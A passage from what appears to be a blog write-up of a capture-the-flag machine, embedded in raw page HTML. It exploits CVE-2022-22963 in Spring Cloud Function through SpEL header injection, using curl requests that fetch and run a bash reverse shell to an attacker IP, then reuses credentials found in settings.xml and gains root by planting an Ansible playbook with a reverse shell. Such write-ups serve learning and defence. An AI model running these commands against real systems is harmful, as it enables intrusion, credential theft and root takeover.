url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAABj0lEQVR42p2T2XKcMBRE53M8CBAgtLGaJFX5/y9qd2tQVSrJg+2HLmakq6O+ix4xZQTvMQwD2rZD17Xo+r6oNQb9FNDbATFG5BRhud5rv+tguG9Mi+b5hmn7jWXb8fAx4cd14f39Qsor3OwwBw/nA4ZxRD862GGEtRaZ6ymGAqtQqW0JJbxpGjxCiFjWDX6e6TRgJERuq/r7sIAxJez7jtnxUsZLntnpjPbluDg86U7Qme4cg+vN1UkFZgLP80QIoUgwfeuZAkzLhv28kJcVqqc2X/VsS4DSULDWBEiEqo41g1FZ8P+rngRa+zpcdNejwqoElMOZwIMO121DWhZMSptrltBnBdZiGtPcX/OPdJGcHHR/qdv8nXUB46vcffahtv8P8jfQEXDSjZqiMYuqYWmkL2XyilOXPwscCfxJd7+Y7krARkWuJXWfNQxfcVhrmAm8WMNEd/M0wVFy6Tg2te6fBqqjZQ6P4zUy1EigevCku6Y25UsOc8ZBoLsH+89xMd8B6j0LWF9Jndn6SgT8ABk9lZnKOap/AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pom.xml" title="" src="/static/cf5cef1004d7872947d18fa66ca3031e/50637/pom-xml.png" srcset="/static/cf5cef1004d7872947d18fa66ca3031e/dda05/pom-xml.png 158w, /static/cf5cef1004d7872947d18fa66ca3031e/679a3/pom-xml.png 315w, /static/cf5cef1004d7872947d18fa66ca3031e/50637/pom-xml.png 630w, /static/cf5cef1004d7872947d18fa66ca3031e/fddb0/pom-xml.png 945w, /static/cf5cef1004d7872947d18fa66ca3031e/3b627/pom-xml.png 1004w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>CVE-2022-22963 is a vulnerability that allows an attacker to execute arbitrary code on a server running Spring Cloud by sending a specially crafted HTTP header. The vulnerability exists within the <code class="language-text">spring.cloud.function.routing-expression</code> header which uses Spring Expression Language (SpEL) as a routing expression to determine which function should be used for a given request. In susceptible versions of Spring Cloud, this header isn't properly validated which allows for the injection of commands on the host machine.</p> <p>The article <a href="https://sysdig.com/blog/cve-2022-22963-spring-cloud/" target="blank">here</a> provides more info on CVE-2022-22963 and also includes a <a href="https://github.com/darryk10/CVE-2022-22963" target="blank">PoC</a>.</p> <p>So, I took the following steps to catch a shell:</p> <p>Created the following <code class="language-text">shell.sh</code> script:</p> <div class="gatsby-highlight" data-language="bash"><pre class="language-bash"><code class="language-bash"><span class="token shebang important">#!/bin/bash</span> /bin/sh <span class="token parameter variable">-i</span> <span class="token operator">>&amp;</span> /dev/tcp/10.10.14.25/9001 <span class="token operator"><span class="token file-descriptor important">0</span>></span><span class="token file-descriptor important">&amp;1</span></code></pre></div> <p>Started a python http server:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 510px; " > <a class="gatsby-resp-image-link" href="/static/d60213f9c6fc5490a626b4ae53d52956/804c1/python-http-server.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.746835443037973%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABDUlEQVR42oWQ626CQBCFeZZyF5DrwoJsUChyqVEbrTHp+z/H6bBgjP7pj5PZs9n95swo+rqAnnxBSy7Q2BVa2MONKzT7K5pu0g/a4Ya6u0A0JxhODs3KoNkZVItBNdnsLS6l+FmLsDzDjXb0iEvp9Nh0ile5+QyzswXwrgXoBQJeXGMVtdA8gq5K+sgR0N2amvhUo/QTfkI+3v4PVF3qzr9hFncY+Q0WG5CKAd14x3j8RU2ji90JYnsEF6NMqVvTFCQCyWrzJ3BPHzNxACsJtOkQZzXSopfKyxEhmxI25DsElDKmFU2J07yXtWrO8s50NgTOoZTVgcjzch/6eJwNWriZvo5GXl00+ed5TvgHKjfAlLDww2EAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="python http server" title="" src="/static/d60213f9c6fc5490a626b4ae53d52956/804c1/python-http-server.png" srcset="/static/d60213f9c6fc5490a626b4ae53d52956/dda05/python-http-server.png 158w, /static/d60213f9c6fc5490a626b4ae53d52956/679a3/python-http-server.png 315w, /static/d60213f9c6fc5490a626b4ae53d52956/804c1/python-http-server.png 510w" sizes="(max-width: 510px) 100vw, 510px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Also, started a netcat listener:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 354px; " > <a class="gatsby-resp-image-link" href="/static/67b395eb03fb7f0f983a3dba67664fd2/ed09d/netcat.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 26.58227848101266%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABBklEQVR42l2PSU/DMBSE+1OAeEkotDSLnaWNWpJmbWgRhEQgIXHjwJ2fP30YUYkeRm809vs8nshZAsddQugncDWAh2/gegTzOrBZjHjVYn94R9WORs3DKx77DxTNgLIZkZU9brwNrkQAZmtMxDwh0N6ILUrYcQsRdVjmL9jWPabzFJ7KsQju4YcFPJ3DVRkpJ19QnkHeJrCk+gVGqxpp9ozlukO62SFOK6h4Cx0VqOoBd/T6OjsgSXe0FIA7GhfMxSX3aPo0/RPMAD+/vqlBRpV9yOsQzjQGlxrcDiFoWVAmnYh8aGA/YrY6eU75H8wAOR0y+r9FQMvMwDQ590zQPdPkXPof8Ai79aH/FAmBIAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netcat" title="" src="/static/67b395eb03fb7f0f983a3dba67664fd2/ed09d/netcat.png" srcset="/static/67b395eb03fb7f0f983a3dba67664fd2/dda05/netcat.png 158w, /static/67b395eb03fb7f0f983a3dba67664fd2/679a3/netcat.png 315w, /static/67b395eb03fb7f0f983a3dba67664fd2/ed09d/netcat.png 354w" sizes="(max-width: 354px) 100vw, 354px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Sent the following <code class="language-text">POST</code> request with <code class="language-text">curl</code> which downloaded the shell script onto the target machine in the <code class="language-text">/tmp</code> directory:</p> <div class="gatsby-highlight" data-language="shell"><pre class="language-shell"><code class="language-shell"><span class="token function">curl</span> <span class="token parameter variable">-X</span> POST <span class="token parameter variable">-H</span> <span class="token string">'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("wget http://10.10.14.25:8000/shell.sh -P /tmp")'</span> <span class="token parameter variable">-d</span> <span class="token string">'data'</span> http://10.10.11.204:8080/functionRouter</code></pre></div> <p>Once the script was on the target, I sent another request to make it executable:</p> <div class="gatsby-highlight" data-language="shell"><pre class="language-shell"><code class="language-shell"><span class="token function">curl</span> <span class="token parameter variable">-X</span> POST <span class="token parameter variable">-H</span> <span class="token string">'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/shell.sh")'</span> <span class="token parameter variable">-d</span> <span class="token string">'data'</span> http://10.10.11.204:8080/functionRouter</code></pre></div> <p>The final request executed the script:</p> <div class="gatsby-highlight" data-language="shell"><pre class="language-shell"><code class="language-shell"><span class="token function">curl</span> <span class="token parameter variable">-X</span> POST <span class="token parameter variable">-H</span> <span class="token string">'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("/tmp/shell.sh")'</span> <span class="token parameter variable">-d</span> <span class="token string">'data'</span> http://10.10.11.204:8080/functionRouter</code></pre></div> <p><code class="language-text">nc</code> caught a shell as the user <code class="language-text">frank</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 517px; " > <a class="gatsby-resp-image-link" href="/static/6d516b5740e5b92ab5b2338d58c965e4/70dcc/frank-shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.11392405063291%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABFUlEQVR42o2Q3XKCQAyFeRahWhBBCuyPIIIrIuAPto7e9P1f4zS7OrXe9eKbbDLJyclaY9bC5hc48oqxOMNja2TqhGr3Zaj3N1TtxRDwCs6U4c3nv+j8L9YsHzCTHcJlhyjvka2PCLnCh6zhRQUmQYZJeMeectguw8hNicRge7SA6o73EGz2V6w2JyxWHYp6QNl8kugBxWYAoyW86CDKHtvDzThOly1ydYQsO4oHpFmNSCrMWUniKSxBA3NypN34SQk/vqNrQVohSCpqVibXrgNWIRKKRDam9h7Il/Ot/vwNseoRL7aIaUA3RaImB3uqNfS+D6b5DiEJC7okzram36Vv0Oe//KE+ceTqRBjsR/wf/MFT8AfZDsUMgJVtVwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="shell as frank" title="" src="/static/6d516b5740e5b92ab5b2338d58c965e4/70dcc/frank-shell.png" srcset="/static/6d516b5740e5b92ab5b2338d58c965e4/dda05/frank-shell.png 158w, /static/6d516b5740e5b92ab5b2338d58c965e4/679a3/frank-shell.png 315w, /static/6d516b5740e5b92ab5b2338d58c965e4/70dcc/frank-shell.png 517w" sizes="(max-width: 517px) 100vw, 517px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Once I was on the system, I found another user, <code class="language-text">phil</code>. This user's account contained the user flag, but I couldn't read it since <code class="language-text">frank</code> didn't have permission:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 571px; " > <a class="gatsby-resp-image-link" href="/static/0a2129045b302a3e6dd17ae0eadd4b5d/0766b/home-users.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 57.59493670886076%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAAB4UlEQVR42m1T7XKiQBDkUS5+gmCUr2WBBSwEJJpokqqk6t7/QfpmBjQxuR9dMztKz/T0rhXoBro6YeUXmNgK01WCifMVJxwJU+erfsWM4ao7WFl1hE+kMy/F4jHHYk1xnWFBZ3tjsKTa3BtqfJ6u1I1YCFc/CPfdGUnewE9qlO07kuIJWX2Gonh4+YuqfaOGLdLqGc3xQ5Qw+f2k6kZspVUPPyrheDGU6YQoKY+I8x5F+wpN+WNcI8oPyKkREwdpiwc7/i+pVTavMPsL5qsISyckqRr2thCZPA3L5IlYukN1rs3pP9Nf+xwJVdFjo2oh4MLcDjF39W13M8pnbkrnjMxRYtzNqBGyU2ck3HXviE2PkGRokpOSSSyZp2b4ek8SOxTNBW5QysfcZGiWSLw2ZsOs5vhJix9IC5I/rOCMLRnBeUpXKi6OqJ8+kO5OqGgA3mdAvztbQ+r2CLNOVPK0VqAq2J6C5xsxQO+exRgxgPLYHORacTM2g6fmPf5ZRje5D/YAITR8D8OSYJCVHaEXknVUCyFffJ7IEGFGZybm83dTRK475FZanmh3LzLdNq6wjSpsqIFLU7CsdbQTU8QcT48m6TuHv8Mq6oskV1dtL4GzySlqimZ8HeMzdNSv5/eT8B+l6oK2dxE2YgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="/home users" title="" src="/static/0a2129045b302a3e6dd17ae0eadd4b5d/0766b/home-users.png" srcset="/static/0a2129045b302a3e6dd17ae0eadd4b5d/dda05/home-users.png 158w, /static/0a2129045b302a3e6dd17ae0eadd4b5d/679a3/home-users.png 315w, /static/0a2129045b302a3e6dd17ae0eadd4b5d/0766b/home-users.png 571w" sizes="(max-width: 571px) 100vw, 571px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I did some further enumeration and found credentials for <code class="language-text">phil</code> within <code class="language-text">/home/frank/.m2/settings.xml</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/0b34b931d04997f0ff7b05c4ecde2d0e/6f406/phil-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 84.17721518987341%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACYElEQVR42nVU2XLiQAz0p2wg3Oaw8e3xATbmdkKyW7X//yO9rbFJyAIPXRq5oCV1a8aIVmd4aofRIkFn5KE79nV8GbpNTly/C14nAu8pDDfetoQKPTNEf0rM4iafBMwjDJh3WuKGXOBq3BGq/IA428F2cwTpAX561DEp3+FGW7jJHvH6jLGV6imkkBQZy3ke3xPG6xqKsL0codogWtUI8xNSEgqxlxx0nm0usMMNhvOEUDDtDGPGV3Z7C0N3wpEXfol0dYQiVrvfqM5/tRRCmG8/IVpLV1dtJYq+d4Su2kN0HLHaxM6JtIGV6SijztwVZs6K54RjBV8GNfiP0KdGTrSh8I34V8hYjUmRxq+Bo3Hr+JXwltQIky0cnx1YMcKkQkjdVPGGlJotWUhMkfzauRT6SfizS8OJdvBF+IzuxhvMbIUFHZ97BebuGuYya+SwUo3HhN+kRpCekBTvGjGFt/0CflzR4T1X6EBnK3ZaadNETyvYsNi6RcG81GeHzSwYDduXPx81ZDRx1rSTZsRl22mLhV9oQpPfxaQpIVM05JJnMEbzFFl5QcRuxjOld6vbt9GVtZAVafFCQ64r8xiuhtHrOViz0qX6QF3UOHHsMixRqS1iSyGg+yFvhOIiK5NX8aF+324br6yacJwzCU9c8ppLfKLD5+qCPQscGevdJ0pqmtP1KYnvV+fGlM7A5eKuebU+aMwb762gRsoCWlNKYbHjKZfb5CTD9qF42uFoliCjwyo/oy+vyzhATzAJ9WsjPxb9OjfP2bPuNGGx+wOHqzGR93AgRngaHQ33STfPF/sfQ7Iji200/UEAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="phil password" title="" src="/static/0b34b931d04997f0ff7b05c4ecde2d0e/50637/phil-password.png" srcset="/static/0b34b931d04997f0ff7b05c4ecde2d0e/dda05/phil-password.png 158w, /static/0b34b931d04997f0ff7b05c4ecde2d0e/679a3/phil-password.png 315w, /static/0b34b931d04997f0ff7b05c4ecde2d0e/50637/phil-password.png 630w, /static/0b34b931d04997f0ff7b05c4ecde2d0e/6f406/phil-password.png 710w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>This allowed me to switch to the <code class="language-text">phil</code> user's account:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 489px; " > <a class="gatsby-resp-image-link" href="/static/af9a413e26244c354daabe29ad56d083/e1d57/su-phil.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 17.72151898734177%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsSAAALEgHS3X78AAAAuklEQVR42oVPRw6DQBDjLSnA0payjW0oREQkHPL/1zgDh1w5WLbHlmYm4X2Ajy/0woNVCgW3BIeiC2Bt+HPOPa6FPkUi3Ip6mMDFBKEf4L1HKyJ6M2MYaZElEHM148LUKRITP9Bxgw4bqi6ikxOkW+DiCmEX0i/U8kGdD6RfMU4b3Pw9fGcWqPCGoZmkw1r9RHIrDfLGI6M3s9qCNRZ3NiBryJeKZuOh8z0nTqlzZNTbdbrnO1cj7qXBD6GcgCZcQi5gAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="su - phil" title="" src="/static/af9a413e26244c354daabe29ad56d083/e1d57/su-phil.png" srcset="/static/af9a413e26244c354daabe29ad56d083/dda05/su-phil.png 158w, /static/af9a413e26244c354daabe29ad56d083/679a3/su-phil.png 315w, /static/af9a413e26244c354daabe29ad56d083/e1d57/su-phil.png 489w" sizes="(max-width: 489px) 100vw, 489px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 586px; " > <a class="gatsby-resp-image-link" href="/static/baeb945ee9c1cd9606c08ef371e3f2fa/9cf6f/user-flag.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 27.848101265822784%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABFUlEQVR42nWR226DMBBE+ZSmuRASEqBxMCa2Q7gIcitUUVX1/z9kul7Up6YPR7tr4Zll7El7Rn66Q6gacz/GZJFgGki8Bukfpiv5LzMmhZeaDuHuiNk6w2Kj4K9T+FSDWGMZaTrLMQ8V964+M/qFBbv+G6buIe0Fuhpg6wHG1WZA2X0iL65IshrN7Qvi0MLf5kwQGzZbcK8Zt5SnihuJuUsNhO4gzZnZiIIExjlKKzLrsdftGA+dx7LCKrGMM3SzM/C0bbGOMmx3Brq803Y9X9LlO20+UH+jj2sU7YPELzh1DxZ+8QVn5351stwzbvYUZRi9WYSRgswr5KaFoocKxQmKhPd63MY2HxzLgUyz45XyzJ4+zg81tMQa6XDC3gAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="user flag" title="" src="/static/baeb945ee9c1cd9606c08ef371e3f2fa/9cf6f/user-flag.png" srcset="/static/baeb945ee9c1cd9606c08ef371e3f2fa/dda05/user-flag.png 158w, /static/baeb945ee9c1cd9606c08ef371e3f2fa/679a3/user-flag.png 315w, /static/baeb945ee9c1cd9606c08ef371e3f2fa/9cf6f/user-flag.png 586w" sizes="(max-width: 586px) 100vw, 586px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>To look for a potential path for privilege escalation, I used <a href="https://github.com/DominicBreuker/pspy" target="_blank">pspy</a> to monitor system processes.</p> <p>I noticed a process using ansible-parallel to execute <em>any</em> YAML files within the <code class="language-text">/opt/automation/tasks</code> directory that ran every two minutes and executed as <code class="language-text">root</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">2023/07/07 05:56:01 CMD: UID=0 PID=2597 | /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml </code></pre></div> <p>Ansible is a tool to automate tasks (which are declared in YAML files called playbooks) and ansible-parallel allows for the execution of multiple Ansible playbooks in parallel.</p> <p>So, I checked the permissions of <code class="language-text">/opt/automation/tasks</code> which showed that members of the <code class="language-text">staff</code> group had read, write, and execute permissions on files within the directory:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 508px; " > <a class="gatsby-resp-image-link" href="/static/9314593b40f43d8338e6b3a6464a3e3a/fa538/opt-automation-tasks.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 67.72151898734178%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB8UlEQVR42o1U23KqQBD0T3JEEUHxwgLLHRHBazTmVOX8/5f06V1SVlLRlA9du+s6PTM9vfSW4QoyrrEUOcKohB+tYU0l+uMAhh1yDfX6FQNHPkQvW1/gJy2GPBgjgYG1gOn4GpabYDzPYM0SjLgfzVKeUx04fES4at5IuMUi3CDI9kjKI2TSwJMV93uUvI/KA+92kLzLN5db1XcJm/0HqvYv5uEay7hBvHpFwDWIN4jLE+JiB8EOXFHx7kTyI0S6xVLWd0l7ImHm/ICBLTs43WqMPK4MsIMfQeY01rhbYdm8a8Kx0sdN4Sxy7jPY1M2mXjbPSkNF4CwLrakKNOwHGlbtFVFx1C2JeKvbDLMjwnSHvD6jbJmw2MOjDFl9Ic4YTGRX/T3CnFOOihMCEoQph7C5kvQVM38F1+90EySbCtqrOGj41FD97qctFnKj9ex/JuglJEs5CD0AIqvOmLDNF1OgbwUafyz/FqAtM4m+41uF9Ruq5krtCt2yF9aYeSvMg1pr5rIyBdONfzX0jXDK4IKkkh7sKmS1rFq1XjKRMv3EK2nsJwmHnJZ6LdvDB4mvaI//4AVrthHpaas/9dmy8QSZJhzQ9V7UoiCpiBq+jhMkB6QSGbwb/vLMHlY4cmJ+EGhWVdW086P5afThV8M/QfgfMiO/OU14DT8AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="/opt/automation/tasks" title="" src="/static/9314593b40f43d8338e6b3a6464a3e3a/fa538/opt-automation-tasks.png" srcset="/static/9314593b40f43d8338e6b3a6464a3e3a/dda05/opt-automation-tasks.png 158w, /static/9314593b40f43d8338e6b3a6464a3e3a/679a3/opt-automation-tasks.png 315w, /static/9314593b40f43d8338e6b3a6464a3e3a/fa538/opt-automation-tasks.png 508w" sizes="(max-width: 508px) 100vw, 508px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">phil</code> was a member of the <code class="language-text">staff</code> group:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 508px; " > <a class="gatsby-resp-image-link" href="/static/05453ed1642c7a1a99c9888136254597/fa538/phil-id.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 10.759493670886075%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAfklEQVR42j2MWw7CIBBFuxaNJrSMDNBCJX1AtR/9cgPufxvXERM/Tia5OXOaMB1w417h+ERnEjQn8JBhBfPd7AIOG6gvcPcdVlwaCm6CiQ/523ClhJMKaI7XG+RLlbXPULz8onYGuVliE5QEqc/Qbv27rWydE/xa70WPOLcRH5F1QQYmXJJoAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="id" title="" src="/static/05453ed1642c7a1a99c9888136254597/fa538/phil-id.png" srcset="/static/05453ed1642c7a1a99c9888136254597/dda05/phil-id.png 158w, /static/05453ed1642c7a1a99c9888136254597/679a3/phil-id.png 315w, /static/05453ed1642c7a1a99c9888136254597/fa538/phil-id.png 508w" sizes="(max-width: 508px) 100vw, 508px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>To get a root shell, all I needed to do was write a custom playbook that contained a reverse shell command.</p> <p>I started a Netcat listener:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 354px; " > <a class="gatsby-resp-image-link" href="/static/67b395eb03fb7f0f983a3dba67664fd2/ed09d/netcat.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 26.58227848101266%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABBklEQVR42l2PSU/DMBSE+1OAeEkotDSLnaWNWpJmbWgRhEQgIXHjwJ2fP30YUYkeRm809vs8nshZAsddQugncDWAh2/gegTzOrBZjHjVYn94R9WORs3DKx77DxTNgLIZkZU9brwNrkQAZmtMxDwh0N6ILUrYcQsRdVjmL9jWPabzFJ7KsQju4YcFPJ3DVRkpJ19QnkHeJrCk+gVGqxpp9ozlukO62SFOK6h4Cx0VqOoBd/T6OjsgSXe0FIA7GhfMxSX3aPo0/RPMAD+/vqlBRpV9yOsQzjQGlxrcDiFoWVAmnYh8aGA/YrY6eU75H8wAOR0y+r9FQMvMwDQ590zQPdPkXPof8Ai79aH/FAmBIAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netcat" title="" src="/static/67b395eb03fb7f0f983a3dba67664fd2/ed09d/netcat.png" srcset="/static/67b395eb03fb7f0f983a3dba67664fd2/dda05/netcat.png 158w, /static/67b395eb03fb7f0f983a3dba67664fd2/679a3/netcat.png 315w, /static/67b395eb03fb7f0f983a3dba67664fd2/ed09d/netcat.png 354w" sizes="(max-width: 354px) 100vw, 354px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, to write a file with <code class="language-text">nano</code> I needed a stable shell, so I ran the following commands:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">python3 -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm Ctrl + Z stty raw -echo; fg</code></pre></div> <p>Next, within <code class="language-text">/opt/automation/tasks</code>, I wrote a custom playbook that uses the <code class="language-text">ansible.builtin.shell</code> module to execute the command:</p> <p><code class="language-text">new_playbook.yml</code>:</p> <div class="gatsby-highlight" data-language="yaml"><pre class="language-yaml"><code class="language-yaml"><span class="token punctuation">-</span> <span class="token key atrule">hosts</span><span class="token punctuation">:</span> localhost <span class="token key atrule">tasks</span><span class="token punctuation">:</span> <span class="token punctuation">-</span> <span class="token key atrule">name</span><span class="token punctuation">:</span> Execute command <span class="token key atrule">ansible.builtin.shell</span><span class="token punctuation">:</span> <span class="token key atrule">cmd</span><span class="token punctuation">:</span> <span class="token string">"bash -c 'bash -i >&amp; /dev/tcp/10.10.14.25/9001 0>&amp;1'"</span></code></pre></div> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 329px; " > <a class="gatsby-resp-image-link" href="/static/fadac856918d0bd21ebbbe2ada6941d5/27845/ls-tasks.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 10.126582278481013%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAhElEQVR42i1N7QrCMBDbq4iIog5RWC2zHW2P2Y+hm67z/d8kO4o/joQkl1RCRZj+wzfC+S90P0F2CY0KoLigtS9oGtH5DBdmKOYP9y664byLuWQvgrA5NKhu8gkbFiiTuHQCpR+snyF0LPx01eXZhgwa/h4XCB51PLivW2yPEruzZLxjBXCKRoVWReAuAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="list playbooks" title="" src="/static/fadac856918d0bd21ebbbe2ada6941d5/27845/ls-tasks.png" srcset="/static/fadac856918d0bd21ebbbe2ada6941d5/dda05/ls-tasks.png 158w, /static/fadac856918d0bd21ebbbe2ada6941d5/679a3/ls-tasks.png 315w, /static/fadac856918d0bd21ebbbe2ada6941d5/27845/ls-tasks.png 329w" sizes="(max-width: 329px) 100vw, 329px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>A few moments later, the task ran and sent a root shell back to my machine:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5382eaffe4784e16806fa1d02ef7ee8c/5176f/root.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 58.86075949367089%; position: relative; bottom: 0; left: 0; background-image: 